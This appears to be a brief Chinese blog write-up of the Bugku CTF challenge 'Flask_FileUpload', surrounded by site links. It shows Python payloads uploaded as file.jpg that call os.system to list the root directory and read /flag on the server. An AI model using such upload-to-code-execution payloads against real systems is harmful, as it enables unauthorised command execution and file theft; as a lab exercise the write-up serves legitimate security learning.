技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
Csvn
12 小时前
描述符协议与动态属性管理
python
东北甜妹
12 小时前
Ansible
python
可视之道
12 小时前
前端大屏适配方案:rem、vw/vh、scale 到底选哪个?
前端
小码哥_常
12 小时前
别在Android ViewModel里处理异常啦,真的很坑!
前端
05大叔
12 小时前
RAG开发
java·服务器·前端
JavaWeb学起来
12 小时前
Python学习教程(一)环境安装,基本数据类型,变量
开发语言·python·python基础
迷藏494
12 小时前
# 发散创新:用 Rust实现高性能测试框架的底层逻辑与实战演练
java·开发语言·后端·python·rust
chushiyunen
12 小时前
python单例模式、大模型一次加载多次复用
开发语言·python·单例模式
console.log('npc')
12 小时前
在 React 中,useRef、ref 属性以及 forwardRef 是处理“引用”(访问 DOM 节点或组件实例)的核心概念
前端·react.js·前端框架
小小小小宇
12 小时前
语法全景对照
前端
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南07【计算机一级WPSoffice】小黑课堂题库软件下载安装教程(2026年3月最新版)08UV安装并设置国内源09OpenClaw 使用和管理 MCP 完全指南10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)